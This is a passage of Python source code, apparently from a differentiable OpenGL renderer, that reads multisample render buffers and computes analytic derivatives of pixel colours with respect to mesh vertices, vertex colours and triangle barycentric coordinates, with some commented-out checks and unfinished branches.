GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RED_INTEGER, GL.GL_UNSIGNED_INT), np.uint32).reshape(self.frustum['height'], self.frustum['height'])[:,:].astype(np.uint32))
self.renders_faces[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT3)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:2].astype(np.float64))
self.renders_sample_barycentric1[sample] = result
GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT4)
result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:1].astype(np.float64))
self.renders_sample_barycentric2[sample] = result
self.renders_sample_barycentric[sample] = np.concatenate([self.renders_sample_barycentric1[sample], self.renders_sample_barycentric2[sample][:,:,0:1]], 2)
# GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
# GL.glReadBuffer(GL.GL_COLOR_ATTACHMENT2)
# result = np.flipud(np.frombuffer(GL.glReadPixels(0, 0, self.frustum['width'], self.frustum['height'], GL.GL_RGB, GL.GL_FLOAT), np.float32).reshape(self.frustum['height'], self.frustum['height'], 3)[:,:,0:3].astype(np.float64))
# self.renders_faces[sample] = result
GL.glBindVertexArray(0)
GL.glClearColor(0.,0.,0., 1.)
GL.glEnable(GL.GL_DEPTH_TEST)
GL.glDisable(GL.GL_MULTISAMPLE)
##Finally return image and derivatives
self.render_resolved = np.mean(self.renders, 0)
self.updateRender = True
self.updateDerivatives_verts = True
self.updateDerivatives_vc = True
def draw_visibility_image_ms(self, v, f):
"""Assumes camera is set up correctly in"""
GL.glUseProgram(self.visibilityProgram_ms)
v = np.asarray(v)
self.draw_visibility_image_ms(v, f)
#Attach FBO
GL.glClear(GL.GL_COLOR_BUFFER_BIT | GL.GL_DEPTH_BUFFER_BIT)
fc = np.arange(1, len(f)+1)
fc = np.tile(fc.reshape((-1,1)), (1, 3))
fc[:, 0] = fc[:, 0] & 255
fc[:, 1] = (fc[:, 1] >> 8 ) & 255
fc[:, 2] = (fc[:, 2] >> 16 ) & 255
fc = np.asarray(fc, dtype=np.uint8)
self.draw_colored_primitives_ms(self.vao_dyn_ub, v, f, fc)
# this assumes that fc is either "by faces" or "verts by face", not "by verts"
def draw_colored_primitives_ms(self, vao, v, f, fc=None):
# gl.EnableClientState(GL_VERTEX_ARRAY)
verts_by_face = np.asarray(v.reshape((-1,3))[f.ravel()], dtype=np.float64, order='C')
# gl.VertexPointer(verts_by_face)
GL.glBindVertexArray(vao)
self.vbo_verts_dyn.set_array(verts_by_face.astype(np.float32))
self.vbo_verts_dyn.bind()
if fc is not None:
# gl.EnableClientState(GL_COLOR_ARRAY)
if fc.size == verts_by_face.size:
vc_by_face = fc
else:
vc_by_face = np.repeat(fc, f.shape[1], axis=0)
if vc_by_face.size != verts_by_face.size:
raise Exception('fc must have either rows=(#rows in faces) or rows=(# elements in faces)')
vc_by_face = np.asarray(vc_by_face, dtype=np.uint8, order='C')
self.vbo_colors_ub.set_array(vc_by_face)
self.vbo_colors_ub.bind()
primtype = GL.GL_TRIANGLES
self.vbo_indices_dyn.set_array(np.arange(f.size, dtype=np.uint32).ravel())
self.vbo_indices_dyn.bind()
GL.glBindFramebuffer(GL.GL_DRAW_FRAMEBUFFER, self.fbo_ms_errors)
drawingBuffers = [GL.GL_COLOR_ATTACHMENT2]
GL.glDrawBuffers(1, drawingBuffers)
view_mtx = self.camera.openglMat.dot(np.asarray(np.vstack((self.camera.view_matrix, np.array([0, 0, 0, 1]))),np.float32))
GL.glUniformMatrix4fv(self.MVP_location, 1, GL.GL_TRUE, np.dot(self.projectionMatrix, view_mtx))
GL.glDisable(GL.GL_DEPTH_TEST)
GL.glDrawElements(primtype, len(self.vbo_indices_dyn), GL.GL_UNSIGNED_INT, None)
GL.glEnable(GL.GL_DEPTH_TEST)
def compute_dr_wrt(self, wrt):
visibility = self.visibility_image
if wrt is self.camera:
derivatives_verts = self.get_derivatives_verts()
return derivatives_verts
elif wrt is self.vc:
derivatives_vc = self.get_derivatives_vc()
return derivatives_vc
# Not working atm.:
elif wrt is self.bgcolor:
return 2. * (self.imageGT.r - self.render_image).ravel() * common.dr_wrt_bgcolor(visibility, self.frustum, num_channels=self.num_channels)
#Not working atm.:
elif wrt is self.texture_stack:
IS = np.nonzero(self.visibility_image.ravel() != 4294967295)[0]
texcoords, texidx = self.texcoord_image_quantized
vis_texidx = texidx.ravel()[IS]
vis_texcoords = texcoords.ravel()[IS]
JS = vis_texcoords * np.tile(col(vis_texidx), [1,2]).ravel()
clr_im = -2. * (self.imageGT.r - self.render_image) * self.renderWithoutTexture
if False:
cv2.imshow('clr_im', clr_im)
# cv2.imshow('texmap', self.texture_image.r)
cv2.waitKey(1)
r = clr_im[:,:,0].ravel()[IS]
g = clr_im[:,:,1].ravel()[IS]
b = clr_im[:,:,2].ravel()[IS]
data = np.concatenate((r,g,b))
IS = np.concatenate((IS*3, IS*3+1, IS*3+2))
JS = np.concatenate((JS*3, JS*3+1, JS*3+2))
return sp.csc_matrix((data, (IS, JS)), shape=(self.r.size, wrt.r.size))
return None
def compute_r(self):
return self.render()
@depends_on(dterms+terms)
def renderWithoutColor(self):
self._call_on_changed()
return self.render_nocolor
@depends_on(dterms+terms)
def renderWithoutTexture(self):
self._call_on_changed()
return self.render_notexture
# @depends_on(dterms+terms)
def render(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateRender:
render = self.compute_image(visible, visibility, self.f)
self.render_result = render
self.updateRender = False
return self.render_result
def get_derivatives_verts(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_verts:
if self.updateRender:
self.render()
derivatives_verts = self.compute_derivatives_verts(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
self.derivatives_verts = derivatives_verts
self.updateDerivatives_verts = False
return self.derivatives_verts
def get_derivatives_vc(self):
self._call_on_changed()
visibility = self.visibility_image
color = self.render_resolved
visible = np.nonzero(visibility.ravel() != 4294967295)[0]
barycentric = self.barycentric_image
if self.updateDerivatives_vc:
if self.updateRender:
self.render()
derivatives_vc = self.compute_derivatives_vc(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
self.derivatives_vc = derivatives_vc
self.updateDerivatives_vc = False
return self.derivatives_vc
# # @depends_on(dterms+terms)
# def image_and_derivatives(self):
# # self._call_on_changed()
# visibility = self.visibility_image
#
# color = self.render_resolved
#
# visible = np.nonzero(visibility.ravel() != 4294967295)[0]
# num_visible = len(visible)
#
# barycentric = self.barycentric_image
#
# if self.updateRender:
# render, derivatives = self.compute_image_and_derivatives(color, visible, visibility, barycentric, self.frustum['width'], self.frustum['height'], self.v.r.size / 3, self.f)
# self.render = render
# self.derivatives = derivatives
# self.updateRender = False
#
# return self.render, self.derivatives
#
def barycentricDerivatives(self, vertices, faces, verts):
import chumpy as ch
vertices = np.concatenate([vertices, np.ones([vertices.size // 3, 1])], axis=1)
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# # Check with autodiff:
#
# view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
# # negYMat = ch.array([[1,0,self.camera.c.r[0]],[0,-1,self.camera.c.r[1]],[0,0,1]])
# verts_hom_ch = ch.Ch(verts_hom)
# camMtx = ch.Ch(np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])])
# projVerts = (camMtx.dot(view_mtx)).dot(verts_hom_ch.T).T[:, :3].reshape([-1, 3])
# viewVerts = ch.Ch(np.array(projVerts))
# projVerts = projVerts[:, :2] / projVerts[:, 2:3]
#
# chViewVerticesNonBnd = camMtx[0:3, 0:3].dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
# p0 = ch.Ch(viewVerticesNonBnd[:, 0, :])
# chp0 = p0
#
# p1 = ch.Ch(viewVerticesNonBnd[:, 1, :])
# chp1 = p1
#
# p2 = ch.Ch(viewVerticesNonBnd[:, 2, :])
# chp2 = p2
#
# # D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
# nt = ch.cross(p1 - p0, p2 - p0)
# chnt = nt
# A = 0.5 * ch.sqrt(ch.sum(nt ** 2, axis=1))
# chnt_norm = nt / ch.sqrt(ch.sum(nt ** 2, axis=1))[:, None]
# # nt = nt / A
#
# chb0part2 = ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1)
# chb0 = 0.5 * ch.sum(ch.cross(chnt_norm, p2 - p1) * (viewVerts - p1), axis=1) / A
# chb1part2 = ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1)
# chb1 = 0.5 * ch.sum(ch.cross(chnt_norm, p0 - p2) * (viewVerts - p2), axis=1) / A
# chb2part2 = ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1)
# chb2 = 0.5 * ch.sum(ch.cross(chnt_norm, p1 - p0) * (viewVerts - p0), axis=1) / A
#
# drb0p0 = chb0.dr_wrt(p0)
# drb0p1 = chb0.dr_wrt(p1)
# drb0p2 = chb0.dr_wrt(p2)
#
# drb1p0 = chb1.dr_wrt(p0)
# drb1p1 = chb1.dr_wrt(p1)
# drb1p2 = chb1.dr_wrt(p2)
#
# drb2p0 = chb2.dr_wrt(p0)
# drb2p1 = chb2.dr_wrt(p1)
# drb2p2 = chb2.dr_wrt(p2)
#
# rows = np.tile(np.arange(drb0p0.shape[0])[None, :], [3, 1]).T.ravel()
# cols = np.arange(drb0p0.shape[0] * 3)
#
# drb0p0 = np.array(drb0p0[rows, cols]).reshape([-1, 3])
# drb0p1 = np.array(drb0p1[rows, cols]).reshape([-1, 3])
# drb0p2 = np.array(drb0p2[rows, cols]).reshape([-1, 3])
# drb1p0 = np.array(drb1p0[rows, cols]).reshape([-1, 3])
# drb1p1 = np.array(drb1p1[rows, cols]).reshape([-1, 3])
# drb1p2 = np.array(drb1p2[rows, cols]).reshape([-1, 3])
# drb2p0 = np.array(drb2p0[rows, cols]).reshape([-1, 3])
# drb2p1 = np.array(drb2p1[rows, cols]).reshape([-1, 3])
# drb2p2 = np.array(drb2p2[rows, cols]).reshape([-1, 3])
#
# chdp0 = np.concatenate([drb0p0[:, None, :], drb1p0[:, None, :], drb2p0[:, None, :]], axis=1)
# chdp1 = np.concatenate([drb0p1[:, None, :], drb1p1[:, None, :], drb2p1[:, None, :]], axis=1)
# chdp2 = np.concatenate([drb0p2[:, None, :], drb1p2[:, None, :], drb2p2[:, None, :]], axis=1)
# #
# # dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
# # dp = dp[None, :]
view_mtx = np.r_[self.camera.view_mtx, np.array([[0, 0, 0, 1]])]
camMtx = np.r_[np.c_[self.camera.camera_mtx, np.array([0, 0, 0])], np.array([[0, 0, 0, 1]])]
verts_hom = np.concatenate([verts.reshape([-1, 3]), np.ones([verts.size // 3, 1])], axis=1)
# viewVerts = negYMat.dot(view_mtx.dot(verts_hom.T).T[:, :3].T).T.reshape([-1, 3])
projVerts = (camMtx.dot(view_mtx)).dot(verts_hom.T).T[:, :3].reshape([-1, 3])
viewVerts = projVerts
projVerts = projVerts[:, :2] / projVerts[:, 2:3]
# viewVerticesNonBnd = negYMat.dot(view_mtx.dot(vertices.T).T[:, :3].T).T.reshape([-1, 3, 3])
p0 = viewVerticesNonBnd[:, 0, :]
p1 = viewVerticesNonBnd[:, 1, :]
p2 = viewVerticesNonBnd[:, 2, :]
p0_proj = p0[:,0:2]/p0[:,2:3]
p1_proj = p1[:,0:2]/p1[:,2:3]
p2_proj = p2[:,0:2]/p2[:,2:3]
# D = np.linalg.det(np.concatenate([(p3 - p1).reshape([nNonBndFaces, 1, 3]), (p1 - p2).reshape([nNonBndFaces, 1, 3])], axis=1))
nt = np.cross(p1 - p0, p2 - p0)
nt_norm = nt / np.linalg.norm(nt, axis=1)[:, None]
# a = -nt_norm[:, 0] / nt_norm[:, 2]
# b = -nt_norm[:, 1] / nt_norm[:, 2]
# c = np.sum(nt_norm * p0, 1) / nt_norm[:, 2]
cam_f = 1
u = p0[:, 0]/p0[:, 2]
v = p0[:, 1]/p0[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p0[:, 2][:,None], np.zeros([len(p0),1]), (-p0[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p0),1]), p0[:, 2][:,None], (-p0[:,1]/v**2)[:,None]]
dxdp_0 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p1[:, 0]/p1[:, 2]
v = p1[:, 1]/p1[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p1[:, 2][:,None], np.zeros([len(p1),1]), (-p1[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p1),1]), p1[:, 2][:,None], (-p1[:,1]/v**2)[:,None]]
dxdp_1 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
u = p2[:, 0]/p2[:, 2]
v = p2[:, 1]/p2[:, 2]
# xudiv = (cam_f - a * u - b * v) ** 2
# xu = np.c_[c * (cam_f - b * v) / xudiv, a * v * c / xudiv, a * cam_f * c / xudiv]
# xv = np.c_[b * u * c / xudiv, c * (cam_f - a * u) / xudiv, b * cam_f * c / xudiv]
xu = np.c_[p2[:, 2][:,None], np.zeros([len(p2),1]), (-p2[:,0]/u**2)[:,None]]
xv = np.c_[np.zeros([len(p2),1]), p2[:, 2][:,None], (-p2[:,1]/v**2)[:,None]]
dxdp_2 = np.concatenate([xu[:, :, None], xv[:, :, None]], axis=2)
# x = u * c / (cam_f - a * u - b * v)
# y = v*c/(cam_f - a*u - b*v)
# z = c*cam_f/(cam_f - a*u - b*v)
A = 0.5*np.linalg.norm(np.cross(p1 - p0, p2 - p0),axis=1)
nt_mag = A*2
# nt = nt / A
# db1 = 0.5*np.cross(nt_norm, p2-p1)/A[:, None]
# db2 = 0.5*np.cross(nt_norm, p0-p2)/A[:, None]
# db3_2 = 0.5*np.cross(nt_norm, p1-p0)/A[:, None]
# db3 = - db1 - db2
p = viewVerts
pre1 = -1/(nt_mag[:,None]**2) * nt_norm
ident = np.identity(3)
ident = np.tile(ident[None,:],[len(p2),1,1])
dntdp0 = np.cross((p2-p0)[:,None,:], -ident) + np.cross(-ident, (p1-p0)[:,None,:])
dntdp1 = np.cross((p2-p0)[:,None,:],ident)
dntdp2 = np.cross(ident,(p1-p0)[:,None,:])
#Pol check this!:
dntnorm = (ident - np.einsum('ij,ik->ijk',nt_norm,nt_norm))/nt_mag[:,None,None]
# dntnorm = (ident - np.einsum('ij,ik->ijk',nt_norm,nt_norm))/nt_mag[:,None,None]
dntnormdp0 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp0)
dntnormdp1 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp1)
dntnormdp2 = np.einsum('ijk,ikl->ijl',dntnorm, dntdp2)
dpart1p0 = np.einsum('ij,ijk->ik', pre1, dntdp0)
dpart1p1 = np.einsum('ij,ijk->ik', pre1, dntdp1)
dpart1p2 = np.einsum('ij,ijk->ik', pre1, dntdp2)
b0 = np.sum(np.cross(nt_norm, p2 - p1) * (p - p1), axis=1)[:,None]
db0part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident,nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1),-ident)
# db0part2p1 = np.einsum('ikj,ij->ik',np.cross((p2 - p1)[:, None, :], dntnormdp0.swapaxes(1,2)), p - p1) + np.einsum('ikj,ij->ik', np.cross(-ident, nt_norm[:, None, :]), p - p1) + np.einsum('ik,ikj->ik', np.cross(p2-p1,nt_norm[:, :]),-ident)
db0part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :],-ident), p - p1) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p2-p1), -ident)
db0part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1,2), (p2 - p1)[:, None, :]), p - p1) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p1)
db0dp0wrtpart1 = dpart1p0*b0
db0dp1wrtpart1 = dpart1p1*b0
db0dp2wrtpart1 = dpart1p2*b0
db0dp0wrtpart2 = 1./(nt_mag[:,None])*db0part2p0
db0dp1wrtpart2 = 1./(nt_mag[:,None])*db0part2p1
db0dp2wrtpart2 = 1./(nt_mag[:,None])*db0part2p2
db0dp0wrt = db0dp0wrtpart1 + db0dp0wrtpart2
db0dp1wrt = db0dp1wrtpart1 + db0dp1wrtpart2
db0dp2wrt = db0dp2wrtpart1 + db0dp2wrtpart2
######
b1 = np.sum(np.cross(nt_norm, p0 - p2) * (p - p2), axis=1)[:, None]
db1part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p2)
db1part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2)
db1part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1, 2),(p0 - p2)[:, None, :]), p - p2) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], -ident), p - p2) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p0-p2), -ident)
db1dp0wrtpart1 = dpart1p0*b1
db1dp1wrtpart1 = dpart1p1*b1
db1dp2wrtpart1 = dpart1p2*b1
db1dp0wrtpart2 = 1./(nt_mag[:,None])*db1part2p0
db1dp1wrtpart2 = 1./(nt_mag[:,None])*db1part2p1
db1dp2wrtpart2 = 1./(nt_mag[:,None])*db1part2p2
db1dp0wrt = db1dp0wrtpart1 + db1dp0wrtpart2
db1dp1wrt = db1dp1wrtpart1 + db1dp1wrtpart2
db1dp2wrt = db1dp2wrtpart1 + db1dp2wrtpart2
######
b2 = np.sum(np.cross(nt_norm, p1 - p0) * (p - p0), axis=1)[:, None]
db2part2p0 = np.einsum('ikj,ij->ik',np.cross(dntnormdp0.swapaxes(1, 2),(p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], -ident), p - p0) + np.einsum('ik,ikj->ik', np.cross(nt_norm[:, :], p1 - p0), -ident)
db2part2p1 = np.einsum('ikj,ij->ik',np.cross(dntnormdp1.swapaxes(1, 2),(p1 - p0)[:, None, :]), p - p0) + np.einsum('ikj,ij->ik', np.cross(nt_norm[:, None, :], ident), p - p0)
db2part2p2 = np.einsum('ikj,ij->ik',np.cross(dntnormdp2.swapaxes(1, 2), (p1 - p0)[:, None, :]), p - p0)
db2dp0wrtpart1 = dpart1p0*b2
db2dp1wrtpart1 = dpart1p1*b2
db2dp2wrtpart1 = dpart1p2*b2
db2dp0wrtpart2 = 1./(nt_mag[:,None])*db2part2p0
db2dp1wrtpart2 = 1./(nt_mag[:,None])*db2part2p1
db2dp2wrtpart2 = 1./(nt_mag[:,None])*db2part2p2
db2dp0wrt = db2dp0wrtpart1 + db2dp0wrtpart2
db2dp1wrt = db2dp1wrtpart1 + db2dp1wrtpart2
db2dp2wrt = db2dp2wrtpart1 + db2dp2wrtpart2
dp0 = np.concatenate([db0dp0wrt[:, None, :], db1dp0wrt[:, None, :], db2dp0wrt[:, None, :]], axis=1)
dp1 = np.concatenate([db0dp1wrt[:, None, :], db1dp1wrt[:, None, :], db2dp1wrt[:, None, :]], axis=1)
dp2 = np.concatenate([db0dp2wrt[:, None, :], db1dp2wrt[:, None, :], db2dp2wrt[:, None, :]], axis=1)
#
dp = np.concatenate([dp0[:, :, None], dp1[:, :, None], dp2[:, :, None]], 2)
#If dealing with degenerate triangles, ignore that gradient.
# dp[nt_mag<=1e-15] = 0
dp = dp[None, :]
nFaces = len(faces)
# visTriVC = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc = self.vc.r[faces.ravel()].reshape([nFaces, 3, 3]).transpose([2, 0, 1])[:, :, :, None, None]
vc[vc > 1] = 1
vc[vc < 0] = 0
visTriVC = vc
dxdp = np.concatenate([dxdp_0[:,None,:],dxdp_1[:,None,:],dxdp_2[:,None,:]], axis=1)
dxdp = dxdp[None, :, None]
# dbvc = np.sum(dp * visTriVC, 2)
# dbvc = dp * visTriVC * t_area[None, :, None, None, None]
dbvc = dp * visTriVC
didp = np.sum(dbvc[:, :, :, :, :, None] * dxdp, 4).sum(2)
#output should be shape: VC x Ninput x Tri Points x UV
# drb0p0 # db0dp0wrt
# drb0p1 # db0dp1wrt
# drb0p2 # db0dp2wrt
# drb1p0 # db1dp0wrt
# drb1p1 # db1dp1wrt
# drb1p2 # db1dp2wrt
# drb2p0 # db2dp0wrt
# drb2p1 # db2dp1wrt
# drb2p2 # db2dp2wrt
#
return didp
def compute_image(self, visible, visibility, f):
"""Construct a sparse jacobian that relates 2D projected vertex positions
(in the columns) to pixel values (in the rows). This can be done
in two steps."""
width = self.frustum['width']
height = self.frustum['height']
num_channels = 3
n_channels = num_channels
vc_size = self.vc.size
# xdiff = dEdx
# ydiff = dEdy
# projVertices = self.camera.r[f[visibility.ravel()[visible]].ravel()].reshape([nVisF,3, 2])
boundaryImage = self.boundarybool_image.astype(np.bool) & (visibility != 4294967295)
rangeIm = np.arange(self.boundarybool_image.size)
zerosIm = np.ones(self.boundarybool_image.shape).astype(np.bool)
edge_visibility = self.boundaryid_image
nsamples = self.nsamples
if np.any(boundaryImage):
boundaryFaces = visibility[(boundaryImage) & (visibility != 4294967295)]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
sampleFaces = self.renders_faces.reshape([nsamples, -1])[:, (zerosIm * boundaryImage).ravel().astype(np.bool)].reshape([nsamples, -1]) - 1
edgeFaces= np.tile(self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]][None, :, :], [8, 1, 1])
edgeSampled = np.any((edgeFaces[:,:, 0]== sampleFaces) | (edgeFaces[:,:, 1]== sampleFaces),0)
facesInsideBnd = projFacesBndTiled == sampleFaces
wrongBnd = ~edgeSampled
# wrongBnd = np.all(facesInsideBnd, 0)
whereBnd = np.where(boundaryImage.ravel())[0]
# boundaryImage.ravel()[whereBnd[wrongBnd]] = False
if np.any(boundaryImage):
sampleV = self.renders_sample_pos.reshape([nsamples, -1, 2])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([nsamples, -1, 2])
# sampleBarycentric = self.renders_sample_barycentric.reshape([nsamples, -1, 3])[:,(zerosIm*boundaryImage).ravel().astype(np.bool),:].reshape([nsamples, -1, 3])
sampleColors = self.renders.reshape([nsamples, -1, 3])[:, (zerosIm * boundaryImage).ravel().astype(np.bool), :].reshape([nsamples, -1, 3])
boundaryFaces = visibility[(boundaryImage)&(visibility !=4294967295 )]
nBndFaces = len(boundaryFaces)
projFacesBndTiled = np.tile(boundaryFaces[None, :], [self.nsamples, 1])
facesInsideBnd = projFacesBndTiled == sampleFaces
facesOutsideBnd = ~facesInsideBnd
vertsProjBnd = self.camera.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2, 2])
vertsProjBndSamples = np.tile(vertsProjBnd[None, :], [self.nsamples, 1,1,1])
vertsProjBndSamplesOutside = vertsProjBndSamples[facesOutsideBnd]
frontFacing = self.frontFacingEdgeFaces[(zerosIm * boundaryImage).ravel().astype(np.bool)].astype(np.bool)
frontFacingEdgeFaces = self.fpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]][frontFacing]
vertsPerFaceProjBnd = self.camera.r[f[frontFacingEdgeFaces.ravel()].ravel()].reshape([1, -1, 2])
vertsPerFaceProjBnd = np.tile(vertsPerFaceProjBnd, [self.nsamples, 1,1])
vertsPerFaceProjBnd = vertsPerFaceProjBnd.reshape([-1,3,2])[facesOutsideBnd.ravel()]
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_edge = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_edge[t_area_bnd_edge > 1] = 1
# if self.debug:
# import pdb; pdb.set_trace()
faces = f[sampleFaces[facesOutsideBnd]].ravel()
vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_outside = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_outside[t_area_bnd_outside > 1] = 1
faces = f[sampleFaces[facesInsideBnd]].ravel()
vertsPerFaceProjBnd = self.camera.r[faces].reshape([-1, 3, 2])
nv = len(vertsPerFaceProjBnd)
p0_proj = np.c_[vertsPerFaceProjBnd[:,0,:], np.ones([nv,1])]
p1_proj = np.c_[vertsPerFaceProjBnd[:,1,:], np.ones([nv,1])]
p2_proj = np.c_[vertsPerFaceProjBnd[:,2,:], np.ones([nv,1])]
t_area_bnd_inside = np.abs(np.linalg.det(np.concatenate([p0_proj[:,None], p1_proj[:,None], p2_proj[:,None]], axis=1))*0.5)
t_area_bnd_inside[t_area_bnd_inside > 1] = 1
#Trick to cap to 1 while keeping gradients.
p1 = vertsProjBndSamplesOutside[:,0,:]
p2 = vertsProjBndSamplesOutside[:,1,:]
p = sampleV[facesOutsideBnd]
l = (p2 - p1)
linedist = np.sqrt((np.sum(l**2,axis=1)))[:,None]
self.linedist = linedist
lnorm = l/linedist
self.lnorm = lnorm
v1 = p - p1
self.v1 = v1
d = v1[:,0]* lnorm[:,0] + v1[:,1]* lnorm[:,1]
self.d = d
intersectPoint = p1 + d[:,None] * lnorm
self.intersectPoint = intersectPoint
v2 = p - p2
self.v2 = v2
l12 = (p1 - p2)
linedist12 = np.sqrt((np.sum(l12**2,axis=1)))[:,None]
lnorm12 = l12/linedist12
d2 = v2[:,0]* lnorm12[:,0] + v2[:,1]* lnorm12[:,1]
nonIntersect = (d2 < 0) | (d<0)
self.nonIntersect = nonIntersect
argminDistNonIntersect = np.argmin(np.c_[d[nonIntersect], d2[nonIntersect]], 1)
self.argminDistNonIntersect = argminDistNonIntersect
intersectPoint[nonIntersect] = vertsProjBndSamplesOutside[nonIntersect][np.arange(nonIntersect.sum()), argminDistNonIntersect]
lineToPoint = (p - intersectPoint)
n=lineToPoint
dist = np.sqrt((np.sum(lineToPoint ** 2, axis=1)))[:, None]
n_norm = lineToPoint /dist
self.n_norm = n_norm
self.dist = dist
d_final = dist.squeeze()
# max_nx_ny = np.maximum(np.abs(n_norm[:, 0]), np.abs(n_norm[:, 1]))
# d_final = d_final/max_nx_ny
# d_final = d_final
verticesBnd = self.v.r[self.vpe[edge_visibility.ravel()[(zerosIm * boundaryImage).ravel().astype(np.bool)]].ravel()].reshape([-1, 2 , 3])
verticesBndSamples = np.tile(verticesBnd[None,:,:],[self.nsamples,1,1, 1])
